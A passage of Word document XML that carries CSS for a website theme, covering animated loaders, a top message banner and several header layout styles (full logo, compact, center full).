        <w:t>.cssload-thecube .cssload-cube{float:left;width:50%;height:50%;position:relative;transform:scale(1.1);-o-transform:scale(1.1);-ms-transform:scale(1.1);-webkit-transform:scale(1.1);-moz-transform:scale(1.1);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-cube:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:$maincolor;animation:cssload-fold-thecube 3.48s infinite linear both;-o-animation:cssload-fold-thecube 3.48s infinite linear both;-ms-animation:cssload-fold-thecube 3.48s infinite linear both;-webkit-animation:cssload-fold-thecube 3.48s infinite linear both;-moz-animation:cssload-fold-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>thecube 3.48s infinite linear both;transform-origin:100% 100%;-o-transform-origin:100% 100%;-ms-transform-origin:100% 100%;-webkit-transform-origin:100% 100%;-moz-transform-origin:100% 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-c2{transform:scale(1.1) rotateZ(90deg);-o-transform:scale(1.1) rotateZ(90deg);-ms-transform:scale(1.1) rotateZ(90deg);-webkit-transform:scale(1.1) rotateZ(90deg);-moz-transform:scale(1.1) rotateZ(90deg);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-c3{transform:scale(1.1) rotateZ(180deg);-o-transform:scale(1.1) rotateZ(180deg);-ms-transform:scale(1.1) rotateZ(180deg);-webkit-transform:scale(1.1) rotateZ(180deg);-moz-transform:scale(1.1) rotateZ(180deg);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-c4{transform:scale(1.1) rotateZ(270deg);-o-transform:scale(1.1) rotateZ(270deg);-ms-transform:scale(1.1) rotateZ(270deg);-webkit-transform:scale(1.1) rotateZ(270deg);-moz-transform:scale(1.1) rotateZ(270deg);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-c2:before{animation-delay:0.44s;-o-animation-delay:0.44s;-ms-animation-delay:0.44s;-webkit-animation-delay:0.44s;-moz-animation-delay:0.44s;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-c3:before{animation-delay:0.87s;-o-animation-delay:0.87s;-ms-animation-delay:0.87s;-webkit-animation-delay:0.87s;-moz-animation-delay:0.87s;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-c4:before{animation-delay:1.31s;-o-animation-delay:1.31s;-ms-animation-delay:1.31s;-webkit-animation-delay:1.31s;-moz-animation-delay:1.31s;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.hidden{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@keyframes cssload-fold-thecube{0%, 10%{transform:perspective(105px) rotateX(-180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>25%,75%{transform:perspective(105px) rotateX(0deg);opacity:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>90%,100%{transform:perspective(105px) rotateY(180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@-o-keyframes cssload-fold-thecube{0%, 10%{-o-transform:perspective(105px) rotateX(-180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>25%,75%{-o-transform:perspective(105px) rotateX(0deg);opacity:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>90%,100%{-o-transform:perspective(105px) rotateY(180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@-ms-keyframes cssload-fold-thecube{0%, 10%{-ms-transform:perspective(105px) rotateX(-180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>25%,75%{-ms-transform:perspective(105px) rotateX(0deg);opacity:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>90%,100%{-ms-transform:perspective(105px) rotateY(180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@-webkit-keyframes cssload-fold-thecube{0%, 10%{-webkit-transform:perspective(105px) rotateX(-180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>25%,75%{-webkit-transform:perspective(105px) rotateX(0deg);opacity:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>90%,100%{-webkit-transform:perspective(105px) rotateY(180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@-moz-keyframes cssload-fold-thecube{0%, 10%{-moz-transform:perspective(105px) rotateX(-180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>25%,75%{-moz-transform:perspective(105px) rotateX(0deg);opacity:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>90%,100%{-moz-transform:perspective(105px) rotateY(180deg);opacity:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-loading .mega-table{display:table;width:100%;height:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-cell{vertical-align:middle;display:table-cell;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Loader Small Size */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.lds-ripple {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.lds-ripple div {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>border: 4px solid $maincolor;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>border-radius: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>animation: lds-ripple 1s cubic-bezier(0, 0.2, 0.8, 1) infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.lds-ripple div:nth-child(2) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>animation-delay: -0.5s;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@keyframes lds-ripple {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>0% {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>top: 28px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>left: 28px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>height: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>100% {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>top: -1px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>left: -1px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: 58px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>height: 58px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* TOP MESSAGE BANNER */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.top-ban{background-color: #fcfcfc;border-bottom: 1px solid #f2f2f2;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.top-ban h2{padding: 40px 0px;font-weight: 600;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.top-ban h2 a{float: right; font-size:14px;padding:15px 20px;border:1px solid #ccc}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.top-ban h2 a:hover{border-color:$maincolor;background: $maincolor;color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Header Style 2 [Full Logo] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .advertisement-top{display: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .header-logo{text-align: center;margin: 28px 0px;margin-bottom:8px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .navigational-menu{display: inline-block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header.full-logo .h-break{clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .topnl,header.full-logo  .topnl ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .topnr ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .topnr{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo ul{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo li{list-style-type: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .topnl a{font-size: 11px;font-weight: 600;padding:4px 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .sf-menu li{position: relative;background:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .sf-menu ul{box-shadow: 1px 1px 4px rgba(0,0,0,.15);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .header-cap-bottom,header.regular .clear-header{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .navigational-menu .sf-menu &gt; li{margin-bottom: -10px;padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; a{padding: 0 14px;line-height: 48px;font-size: 14px;color: $darkcolor;font-weight: 500;text-transform: uppercase;-webkit-backface-visibility: hidden; font-family: 'Open Sans', sans-serif;  font-weight: 700;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; ul li a{padding: 7px 30px;font-size: 12px;line-height: 20px;color: #111;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; ul li a:hover{color:$maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .topmenus .topnl a{font-weight: 500;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .topmenus .topnl a:hover{color:$maincolor;text-decoration:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .navigational-menu{width: 100%}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo #header img{margin: 0 auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .nav-bak{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .navigational-menu{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .navigational-menu .widget{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .static-object{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.full-logo .static-object ul{margin-top: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Header Style 3 [Compact] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .advertisement-top{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .navigational-menu{float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header.compact .header-logo{display: block;min-height: 1px;float: left;width: 272px;position: relative;margin-bottom: 8px;margin-top: 8px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .h-break, header.compact .clear-header{clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .navigational-menu{padding: 22px 30px 0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .topnl,header.compact .topnl ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .topnr ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .topnr{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact ul{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact li{list-style-type: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .topnl a{font-size: 11px;font-weight: 600;padding:4px 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .sf-menu &gt; li &gt; a:before{background-color: transparent;content: '';width: 0;height: 3px;position: absolute;bottom: 0;left: 0;right: 0;margin: 0 auto;-webkit-transform: translate3d(0,0,0);transform: translate3d(0,0,0);-webkit-transition: width .2s ease;-moz-transition: width .2s ease;-o-transition: width .2s ease;transition: width .2s ease;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .sf-menu li{position: relative;background:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .sf-menu ul{box-shadow: 1px 1px 4px rgba(0,0,0,.15);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .header-cap-bottom,header.regular .clear-header{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .navigational-menu .sf-menu &gt; li{margin-bottom: -6px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; a{padding: 0 14px;line-height: 48px;font-size: 14px;color: $darkcolor;font-weight: 500;text-transform: uppercase;-webkit-backface-visibility: hidden; font-family: 'Open Sans', sans-serif;  font-weight: 700;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; ul li a{padding: 7px 30px;font-size: 12px;line-height: 20px;color: #111;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .sf-menu &gt; li &gt; ul li a:hover{color:$maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .navigational-menu{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .nav-bak{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .navigational-menu{position: static;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .navigational-menu .widget{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .static-object{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .static-object ul{margin-top: 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .row-custom &gt; .container{position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header.compact .navigationmenu{border-right: 1px solid #d7d7d7;margin-right: 10px !important;padding-right: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.compact .static-object ul{margin: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Header Style 4 [Center Full] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .advertisement-top{display: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .header-logo{text-align: center;margin: 28px 0px;margin-bottom:8px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .navigational-menu{display: inline-block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .h-break{clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .topnl,header.center-full  .topnl ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .topnr ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .topnr{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full ul{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full li{list-style-type: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .topnl a{font-size: 11px;font-weight: 600;padding:4px 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .sf-menu &gt; li &gt; a:before{background-color: transparent;content: '';width: 0;height: 3px;position: absolute;bottom: 0;left: 0;right: 0;margin: 0 auto;-webkit-transform: translate3d(0,0,0);transform: translate3d(0,0,0);-webkit-transition: width .2s ease;-moz-transition: width .2s ease;-o-transition: width .2s ease;transition: width .2s ease;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .sf-menu li{position: relative;background:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .sf-menu ul{box-shadow: 1px 1px 4px rgba(0,0,0,.15);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .header-cap-bottom,header.regular .clear-header{display: none}</w:t>
      </w:r>
    </w:p>
